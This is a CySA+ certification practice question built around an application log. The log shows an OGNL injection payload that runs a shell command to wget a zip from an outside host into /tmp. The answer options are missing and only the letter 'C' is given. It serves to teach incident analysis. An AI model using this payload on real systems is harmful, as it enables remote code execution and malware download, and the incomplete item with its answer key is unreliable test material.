Question 153 of 160 from exam CS0-002: CompTIA CySA+

Question

An application server runs slowly and then triggers a high CPU alert.

After investigating, a security analyst finds an unauthorized program is running on the server.

The analyst reviews the application log below.

20xx-03-13 05:54:50,523 ajp-bio-8009-exec-10 WARN

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).
(#cmd='cd /tmp/beap/; wget hxxp://domain.com/tmp/ben/xm.zip; ls -la').(#iswin=
(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
(#process=#p.start())

Which of the following conclusions is supported by the application log?

Answers

Explanations

A. B. C. D.

C.